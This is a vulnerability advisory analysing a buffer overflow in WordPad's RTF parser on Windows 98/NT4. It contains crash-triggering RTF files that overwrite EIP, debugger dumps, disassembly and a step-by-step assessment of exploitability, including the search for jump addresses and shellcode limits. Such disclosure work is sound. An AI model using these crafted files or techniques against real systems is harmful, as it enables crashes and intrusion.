COMMAND
WordPad/riched20.dll
SYSTEMS AFFECTED
Win98/NT
PROBLEM
This is not a security issue. No exploit is possible. However,
it's good reading and it is recommended.
Pauli Ojanpera found the following. Win98/NT4 Riched20.dll (which
WordPad uses) has a classic buffer overflow problem with
".rtf" files.
Crashme.rtf:
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
A malicious document could probably abuse this to execute arbitrary
code. WordPad crashes with EIP=41414141.
Thomas Dullien added the following. His file looks like this when
viewed in Notepad:
{\rtf1\ansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1031\pard\plain\f2\fs20 HOLA :)
\par }
If you're looking for simplicity:
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE}
and you will get 0x45444342 in EIP after the crash.
Gerardo Richarte has been playing with this since yesterday. Just
today he managed to trigger the buffer overflow with EIP pointing
to 0x61616161, BUT... (of course, what did you expect?) first
things first (demo):
---------- kk.rtf -----------------------------
{\rtf1\abcdefghijklmnaabbstuvwxyzabcdefghijklmnccddstuvwxyzabcdefghijklmneeffstuvwxyzabcdefghijklmngghhstuvwxyzabcdefghijklmniijjstuvwxyzabcdefghijklmnkkllstuvwxyzabcdefghijklmnmmnnstuvwxyzansi\deff0\deftab720{\fonttbl{\f0\fswiss
MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New
Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1033\pard\plain\f2\fs20 hola
\par }
^@
-----------------------------------------------
It's a standard RTF file for the text 'hola', plus an inserted
string ('abcde....xyz') before the string 'ansi'. 'ccdd' is the
return address (EIP). If the string 'ansi' is missing (I tested
with some other strings, though not every other string...),
nothing 'good' happens. Any non-letter character before the
string 'ccdd' makes nothing happen. I'm not sure which characters
can appear in this section of the .RTF. If uppercase letters are
used, they are lowercased (at least in the return address).
Jason doesn't know the opcodes for an Intel processor, but has
control of the stack. So if some assembly guru fills in the
empty space with some interesting opcodes, we are in business.
The following contents of an RTF document:
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ0AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGGHHHHHIIIIIJJJJJKKKKKLLLLLMMMMMNNNNNOOOOOPPPPPQQQQQRRRRRSSSSSTTTTTUUUUUVVVVVWWWWWXXXXXYYYYYZZZZZ}
will cause the following dump:
WORDPAD caused an invalid page fault in
module <unknown> at 00de:41414141.
Registers:
EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212
EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409
ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7
EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e
Bytes at CS:EIP:
Stack dump:
44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c
00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002
Notice that we control EIP (41414141, all As) and that the first
part of the stack is also under our control (44434241 48474645
reads as DCBA HGFE). This is reversed because the i386 is
little-endian: the dword 44434241 is stored in memory as the
bytes 41 42 43 44, i.e. 'ABCD'.
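To make the byte order concrete, here is a small Python sketch (Python is our choice for illustration; the helper name is made up) that lays the dwords from the dump back out in memory order. It uses only the values printed above.

```python
import struct

def dwords_to_bytes(words):
    """Lay out 32-bit values the way the i386 stores them (little-endian)."""
    return b"".join(struct.pack("<I", w) for w in words)

# First two dwords of the stack dump above.
print(dwords_to_bytes([0x44434241, 0x48474645]))  # b'ABCDEFGH'
# The faulting EIP is just the four bytes "AAAA".
print(dwords_to_bytes([0x41414141]))              # b'AAAA'
# The EIP from the "simplicity" example, in memory order.
print(dwords_to_bytes([0x45444342]))              # b'BCDE'
```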
On NT, WordPad crashes with lowercased letters, as opposed to
uppercase on 98. That's why some people get 41414141 and some
get 61616161.
The MSDN Library has been updated with a more sensible example of
an RTF parser.
Solar Eclipse did a great job examining this issue. OK,
let's try to exploit this shit. First, try to crash WordPad.
Create the following file:
{\rtf\AAAAAAAAAA(100 'A's)}
Solar was using SoftICE to inspect the situation after the crash.
First, take a look at the registers and the stack.
EIP=61616161
ESP=0012F044
EBP=61616161
ebp eip
0023:0012F024 0012F104 00000102 61616161 61616161 ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023 ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000 aaaaaaaa........
We can assume that EBP and EIP were popped from the stack and then
a RET 10 was executed, which pops EIP and then adds another 10h to
the stack pointer. To check whether this is the case, try the
following:
{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}
WordPad crashes again. The registers and the stack are as follows:
ESP=0012F054
EBP=6A6A6A6A 'jjjj'
EIP=6B6B6B6B 'kkkk'
ebp eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023 ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373 ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777 ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200 xxxxyyyyzzzz....
Yes, our assumption was correct. EBP gets its value from
0012F03C, and the RET 10 instruction gets the EIP from 0012F040.
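The AAAABBBB...ZZZZ trick works because every four-byte group is unique, so a register value maps straight back to an offset in the string. A minimal Python sketch, assuming only the lowercasing and little-endian layout described in this advisory (the helper names are hypothetical):

```python
import string

def pattern():
    """The AAAABBBB...ZZZZ test string from the RTF file above."""
    return "".join(c * 4 for c in string.ascii_uppercase)

def offset_of(register_value, pat):
    """Offset in `pat` of the four bytes a register was loaded from.

    The parser lowercases the letters, so the pattern is lowercased first,
    and the register value is converted back to memory (little-endian) order.
    """
    needle = register_value.to_bytes(4, "little").decode("ascii")
    return pat.lower().index(needle)

p = pattern()
print(offset_of(0x6A6A6A6A, p))  # 36: 'jjjj' ended up in EBP
print(offset_of(0x6B6B6B6B, p))  # 40: 'kkkk' ended up in EIP
```

In other words, 36 bytes of the string come before the value that lands in EBP.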
The buffer is probably 36 characters long, because 'jjjj' (bytes
37-40 of the string) overwrites the saved EBP. By the way, notice
that the characters are lowercased. This means that the string is
lowercased before the crash. Let's try the following file (36
characters):
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}
It shouldn't crash, but it does. This is strange. (By the way, do
a quick check with 35 characters: WordPad will not crash.) Take a
look at the registers and the stack:
EIP=002E0033
ESP=0012F108
EBP=00200067
0023:0012F0E8 0012F294 6E002F02 00200067 002E0033 ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023 ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073 .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000 .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000 ................
0023:0012F138 0012F194 5F816876 00000014 00000000 ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064 ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850 ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168 .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8 .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8 xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
This is even stranger. EBP and EIP are not overwritten by our
string, but they are still smashed. It's time to find exactly
which code is guilty of this mess. Notice that EIP is
overwritten, so we don't know what code was executed before the
crash. Pauli Ojanpera posted that the crash was in riched20.dll.
Check the loaded DLLs: there is no riched20.dll, but we see
riched32.dll. This sounds good! At what address is this DLL
loaded?
:map32 riched32
Owner Obj Name Obj# Address Size Type
RICHED32 .text 0001 001B:6C001000 00027284 CODE RO
The code is loaded at 6C001000. Where is the buffer overflow? It
is probably located in some function in RICHED32.DLL. This
function is probably called from some other function, which is
also called from somewhere. We should be able to see the return
addresses for these previous calls on the stack. Let's search
for something that looks like a return address. At 0012F1D0 we
see the bytes 6C026B81. This looks like an address in
RICHED32.DLL, doesn't it? Go disassemble the bastard! It is part
of a function starting at 6C026B0B and ending at 6C026B68 (some
more code in the middle is included; more about it later):
001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mov ecx, esi
001B:6C026B7C call 6C0267D1 ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret
Put a breakpoint at the beginning of this function and see what
happens. The 6C026B0B function is called twice and crashes the
second time. Trace it step by step, stepping over the calls.
The function crashes after the final RET instruction (located at
6C026B68). Just before the crash the stack looks like this:
edi esi local_var old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0 <- ret address
The POP EDI and POP ESI instructions restore these two registers
(look at the disassembly). Then the function restores ESP (which
is saved in EBP at the beginning of the function). By trying this
with a normal RTF file (not causing a buffer overflow), we see
that ESP becomes 0012F1E0. Then EBP is popped from the stack (it
becomes 0012F40C) and the RET instruction returns the execution
flow to 6C024DE0. This is not the case with a fucked up RTF file.
Everything is OK until we hit the MOV ESP, EBP instruction. The
value in the EBP register is not correct, thus fucking up ESP and
causing a mess.
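The effect of the bad EBP can be checked with a few lines of arithmetic. The Python sketch below is a toy model, not a real emulator: it assumes the epilogue is MOV ESP,EBP / POP EBP / RET as the text describes (the POP EBP is not visible in the listing above), and it fills memory only with values quoted in this advisory. For the smashed case, the two dwords at 0012F100 and 0012F104 are simply taken from the EBP and EIP the crash reported, so only the resulting ESP is an independent check against SoftICE.

```python
def epilogue(ebp, memory):
    """Toy model of MOV ESP,EBP / POP EBP / RET.

    `memory` maps stack addresses to the dwords stored there.
    Returns the (EIP, EBP, ESP) the CPU ends up with.
    """
    esp = ebp                 # MOV ESP, EBP
    new_ebp = memory[esp]     # POP EBP
    esp += 4
    eip = memory[esp]         # RET
    esp += 4
    return eip, new_ebp, esp

# Normal file: frame pointer 0012F1E0, old EBP and return address above it.
good = {0x0012F1E0: 0x0012F40C, 0x0012F1E4: 0x6C024DE0}
print([hex(v) for v in epilogue(0x0012F1E0, good)])
# ['0x6c024de0', '0x12f40c', '0x12f1e8']

# 36-character file: EBP was corrupted to 0012F100.
bad = {0x0012F100: 0x00200067, 0x0012F104: 0x002E0033}
print([hex(v) for v in epilogue(0x0012F100, bad)])
# ['0x2e0033', '0x200067', '0x12f108']
```

The smashed case ends with ESP=0012F108, the same value SoftICE showed after the 36-character crash.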
OK, now we need to find where in the 6C026B0B function EBP is
smashed. Put a breakpoint at the beginning of the function and
trace it (without stepping into the calls). EBP at the beginning
of the function is 0012F1E0. It changes after the CALL 6C0267D1
instruction. Now we have the function that changes EBP.
001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...
The stack of this function looks like this:
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
ebp eip
At 0012F1D0 we have the return address. EBP is saved at
0012F1CC, and then the stack pointer is decremented by 24h (36),
leaving space for 36 bytes of local variables. Remember this
number? This is our buffer! After some more tracing, we see that
the saved EBP is changed by the instruction at 6C0268E9
(mov byte ptr [ebx], 00), executed right after the buffer is
filled with our characters. This is the NULL termination of the
string. With 36 characters it lands on the lowest byte of the
saved EBP and changes it from 0012F1E0 to 0012F100. Let's do some
more reverse engineering. From 6C0268AE to 6C0268DB we have a
loop that reads our string and copies it into the buffer.
001B:6C0268AE mov al, [ecx] ; get the current char
001B:6C0268B0 inc ecx ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al ; store the current char at 0012F1CB
001B:6C0268B4 mov [esi+1C], ecx ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001 ; what the fuck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9 ; never taken: TEST always clears CF
001B:6C0268C0 movzx eax, byte ptr [ebp-01] ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01 ; is it 'A'-'Z' or 'a'-'z'?
001B:6C0268CB jz 6C0268E9 ; no -> go there
001B:6C0268CD mov al, [ebp-01] ; get the current char
001B:6C0268D0 or al, 20 ; make it lowercase
001B:6C0268D2 mov [ebx], al ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1c] ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx ; reached the end of the string?
001B:6C0268DB jnz 6C0268AE ; no -> loop again
ECX is a pointer to the memory location where the RTF file is
loaded. It points to the character that we are currently copying.
EBX points to the buffer. The buffer starts at 0012F1A8.
By the way, notice that the current character is stored at
[ebp-01], i.e. 0012F1CB (the third line in the disassembly). This
means that our buffer is only 32 bytes long, and we have another
local variable after it. This doesn't really matter, because the
copying process works even if we overwrite this variable (it is
stored again for every character). If we put some shellcode
there, we need to know that this particular byte will be changed
to the first character after the end of the string. In our case,
this is '}'.
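The loop and the stray NUL can be reproduced in a few lines. This is a hypothetical Python model of the 6C0267D1 frame, with offsets counted from the start of the buffer (0012F1A8): 32 bytes of buffer, the current-character byte at [ebp-01] (offset 35), the saved EBP at offset 36 and the return address at offset 40. The frame layout and helper names are assumptions reconstructed from the dumps, and the end-of-string check at 6C0268D8 is left out because our test strings always end in '}'.

```python
import struct

# Hypothetical model of the 6C0267D1 stack frame, offsets from 0012F1A8.
CUR_CHAR = 35     # [ebp-01]: holds the character currently being copied
SAVED_EBP = 36    # caller's EBP, 0012F1E0 in a normal run
RET_ADDR = 40     # return address into 6C026B0B, 6C026B81

def is_letter(b):
    """Same result as the 'test byte ptr [eax+6C00C6B8], 01' check."""
    return 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A

def new_frame(size=64):
    frame = bytearray(size)
    struct.pack_into("<I", frame, SAVED_EBP, 0x0012F1E0)
    struct.pack_into("<I", frame, RET_ADDR, 0x6C026B81)
    return frame

def copy_control_word(src, frame):
    """Mimic the 6C0268AE..6C0268DB loop plus the NUL store at 6C0268E9."""
    ebx = 0                        # EBX starts at the buffer
    for ch in src:
        frame[CUR_CHAR] = ch       # mov [ebp-01], al
        if not is_letter(ch):
            break                  # jz 6C0268E9
        frame[ebx] = ch | 0x20     # or al, 20 / mov [ebx], al
        ebx += 1
    frame[ebx] = 0                 # mov byte ptr [ebx], 00
    return frame

for n in (35, 36):
    text = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"[:n] + b"}"
    f = copy_control_word(text, new_frame())
    saved = struct.unpack_from("<I", f, SAVED_EBP)[0]
    print(n, hex(saved), bytes(f[32:36]))
# 35 0x12f1e0 b'iii\x00'
# 36 0x12f100 b'iii}'
```

With 35 letters the NUL lands on the [ebp-01] byte and nothing else changes; with 36 it lands on the low byte of the saved EBP, and the 'iii}' bytes match the 7D696969 dword in the dump.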
Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
memory location (6C00C6B8) we have an array of bytes,
corresponding to each ASCII value.
The array at 6C00C6B8
+00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30 06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
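The table is easy to check mechanically. The Python sketch below copies the non-zero rows from the dump above (every other row is all zeros) and lists the bytes whose entry has bit 01h set. Reading bit 04h as a "hex digit" flag is only our guess from the pattern of 05 and 06 values; the copy loop only tests bit 01h.

```python
# Non-zero rows of the 256-byte table at 6C00C6B8, copied from the dump above.
ROWS = {
    0x30: "06 06 06 06 06 06 06 06 06 06 00 00 00 00 00 00",
    0x40: "00 05 05 05 05 05 05 01 01 01 01 01 01 01 01 01",
    0x50: "01 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00",
    0x60: "00 05 05 05 05 05 05 01 01 01 01 01 01 01 01 01",
    0x70: "01 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00",
}

table = bytearray(256)          # all other rows are zero
for base, row in ROWS.items():
    table[base:base + 16] = bytes.fromhex(row)

def chars_with_bit(mask):
    """All byte values whose table entry has `mask` set, as text."""
    return bytes(c for c in range(256) if table[c] & mask).decode("ascii")

print(chars_with_bit(0x01))  # ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
print(chars_with_bit(0x04))  # 0123456789ABCDEFabcdef
```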
The only ASCII characters that will pass the JZ condition after
the TEST instruction are the letters 'A'-'Z' and 'a'-'z' (hex
values 41-5A and 61-7A). If any other character is reached, the
copying stops and the buffer is NULL terminated. Next, we try to
really take over the return address.
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAAA(more As)}
'jjjj' overwrites the saved EBP and the return address becomes
'kkkk'. After the overwritten return address, we have more As.
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 6A6A6A6A 6B6B6B6B 61616161 iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000 aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000 ................
0023:0012F2A8 00000000 000C1814 00000000 00000000 ................
At 0012F2AC we have a pointer to the current character in the file
buffer. ECX is saved to this location (referenced as esi+1C)
before the copying, and restored afterwards. This value is
updated after every copied byte. If we overwrite it, it will
start pointing to a new memory location. The copy loop will try
to read the bytes to copy from there and probably crash. Even if
we somehow manage to overwrite this with a valid memory pointer,
this will be the last byte copied from our string. This limits us
to 216 'A's after the 'jjjjkkkk'.
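The 216-byte limit is plain address arithmetic on the dump above. A tiny Python check, with the three addresses taken from this particular NT 4.0 run (they will differ on other systems):

```python
BUFFER_START = 0x0012F1A8   # first byte of the 32-byte buffer
RET_SLOT = 0x0012F1D0       # return address, overwritten with 'kkkk'
SRC_POINTER = 0x0012F2AC    # [esi+1C], the saved source pointer (ECX)

room_after_ret = SRC_POINTER - (RET_SLOT + 4)
total_room = SRC_POINTER - BUFFER_START
print(room_after_ret, total_room)  # 216 260
```

The 260 bytes split as 36 bytes up to the saved EBP, 8 bytes of 'jjjjkkkk', and the 216 letters after them.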
Exploiting this buffer overflow will be hard. Maybe not
impossible, but very hard. We have only 216 bytes to squeeze our
shellcode into, and we can use only 26 characters: the letters
from 'a' to 'z'. Writing shellcode with no NULs is hard; writing
one with only letters is almost impossible. First, we need some
way of pointing the return address to something useful. We
cannot point it to the stack, because stack addresses (0012xxxx)
contain 'prohibited' characters. After the RET instruction, ESP
points to the second part of our string (the one after
'jjjjkkkk'). We need a JMP ESP or CALL ESP instruction. The usual
approach is to look at the DLLs loaded at the time of the crash
and find one of these instructions at some memory location. Then
we can point the return address to this memory location and have
it jump back to our shellcode. The problem is that the address of
this memory location must consist only of lowercase letters.
c:\>listdlls.exe wordpad
ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com
------------------------------------------------------------------------------
WORDPAD.EXE pid: 275
Base Size Version Path
0x029a0000 0x34000 4.00.1381.0096 C:\Program Files\Windows NT\Accessories\wordpad.exe
0x77f60000 0x5e000 4.00.1381.0174 C:\WINNT\System32\ntdll.dll
0x5f800000 0xee000 4.21.0000.7160 C:\WINNT\System32\MFC42u.DLL
0x78000000 0x40000 6.00.8397.0000 C:\WINNT\system32\MSVCRT.dll
0x77f00000 0x5e000 4.00.1381.0178 C:\WINNT\system32\KERNEL32.dll
0x77ed0000 0x2c000 4.00.1381.0115 C:\WINNT\system32\GDI32.dll
0x77e70000 0x54000 4.00.1381.0133 C:\WINNT\system32\USER32.dll
0x77dc0000 0x3f000 4.00.1381.0203 C:\WINNT\system32\ADVAPI32.dll
0x77e10000 0x57000 4.00.1381.0193 C:\WINNT\system32\RPCRT4.dll
0x77d80000 0x32000 4.00.1381.0133 C:\WINNT\system32\comdlg32.dll
0x70970000 0x1a8000 4.72.3110.0006 C:\WINNT\system32\SHELL32.dll
0x70bd0000 0x44000 5.00.2314.1000 C:\WINNT\system32\SHLWAPI.dll
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
0x77b20000 0xb6000 4.00.1381.0190 C:\WINNT\system32\ole32.dll
0x76aa0000 0x6000 4.00.1371.0001 C:\WINNT\System32\INDICDLL.dll
0x77c00000 0x18000 4.00.1381.0027 C:\WINNT\System32\WINSPOOL.DRV
0x775a0000 0x14000 0.02.0000.0000 C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
0x6c000000 0x2e000 4.00.0993.0004 C:\WINNT\System32\RICHED32.dll
0x70400000 0x77000 5.00.2314.1000 C:\WINNT\System32\mlang.dll
These are the loaded DLLs that we can use. The perfect DLL would
be the same on Windows 95, 98, 98 SE, NT 4 with all service packs
and on Win2K. Unfortunately, such a DLL is just a dream. Our
choices are really limited. Looking at the base addresses and
sizes, we can eliminate most of the DLLs, because they don't
contain any all-letter addresses. This leaves us with only one
DLL that we can use:
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
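Whether a module has usable return addresses can be checked mechanically: every byte of the address must be a lowercase letter (61h-7Ah), since uppercase is folded to lowercase and anything else stops the copy. This Python sketch assumes the ListDLLs output above is the complete module list and treats every address in [base, base + size) as mapped; it says nothing about which instructions live at those addresses.

```python
from itertools import product

# (base, size, name) from the ListDLLs output above.
MODULES = [
    (0x029A0000, 0x34000, "wordpad.exe"),
    (0x77F60000, 0x5E000, "ntdll.dll"),
    (0x5F800000, 0xEE000, "MFC42u.DLL"),
    (0x78000000, 0x40000, "MSVCRT.dll"),
    (0x77F00000, 0x5E000, "KERNEL32.dll"),
    (0x77ED0000, 0x2C000, "GDI32.dll"),
    (0x77E70000, 0x54000, "USER32.dll"),
    (0x77DC0000, 0x3F000, "ADVAPI32.dll"),
    (0x77E10000, 0x57000, "RPCRT4.dll"),
    (0x77D80000, 0x32000, "comdlg32.dll"),
    (0x70970000, 0x1A8000, "SHELL32.dll"),
    (0x70BD0000, 0x44000, "SHLWAPI.dll"),
    (0x71590000, 0x87000, "COMCTL32.dll"),
    (0x77B20000, 0xB6000, "ole32.dll"),
    (0x76AA0000, 0x6000, "INDICDLL.dll"),
    (0x77C00000, 0x18000, "WINSPOOL.DRV"),
    (0x775A0000, 0x14000, "RASDDUI.DLL"),
    (0x6C000000, 0x2E000, "RICHED32.dll"),
    (0x70400000, 0x77000, "mlang.dll"),
]

LETTERS = range(0x61, 0x7B)  # 'a'..'z', the only bytes that reach the stack

def letter_addresses(base, size):
    """Addresses in [base, base + size) whose four bytes are all 'a'..'z'."""
    end = base + size
    hits = []
    for b3, b2 in product(LETTERS, LETTERS):        # top two bytes
        block = (b3 << 24) | (b2 << 16)
        if block + 0xFFFF < base or block >= end:
            continue                                 # 64 KB block misses the module
        for b1, b0 in product(LETTERS, LETTERS):     # low two bytes
            addr = block | (b1 << 8) | b0
            if base <= addr < end:
                hits.append(addr)
    return hits

for base, size, name in MODULES:
    hits = letter_addresses(base, size)
    if hits:
        print(f"{name}: {len(hits)} addresses, {hits[0]:08X}..{hits[-1]:08X}")
# COMCTL32.dll: 390 addresses, 71616161..71616F7A
```

Only COMCTL32 survives, and only the 64 KB block starting at 71610000 overlaps it; the image ends at 71616FFF, so the highest all-letter address is 71616F7A.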
We can only use the code in the range from 71616161 to 71616F7A
(the DLL image ends at 71616FFF). After disassembling the DLL and
looking at the code, we clearly see that there is no JMP ESP or
CALL ESP instruction there. There is no way to execute the
shellcode. Even if we could do it, making the shellcode do
something useful would be a pain in the ass. The restrictions are
too harsh.
After the RET instruction, at ESP-50 we have a pointer to the
beginning of the buffer, where the raw file is loaded. This
buffer holds the raw file contents, so we can use NULLs and
non-letter characters. Unfortunately, this buffer is in the heap
and we cannot execute any code from there. We need to copy the
code to the stack first.
Ussr Labs found SOME other ways to CRASH it (no exploit possible),
in another place in the RTF format, in riched20.dll, by putting an
EATER OF STACK inside the RTF file. Example RTF code:
{\rtf1\ansi\ansicpg1252\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1
\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}{\f3\froman Times New Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1033\horzdoc{\*\fchars }{\*\lchars }\pard\plain\f2\fs20
hello!!!!{\object\objemb{\*\objclass WordPad.Document.1}{\*\objname
Object1}\objw11115\objh293
{\*\objdata
BUFFER
}}}\plain\f2\fs20 !!!!!!!!!!!!!!!!
\par }
where BUFFER is roughly 9 KB of (123456789abcdefghijklmnopqrstuvwyz).
But it just eats the stack and crashes OLE, and it does not seem
possible to make an exploit out of this.
SOLUTION
Nothing yet. And nothing will be. This time.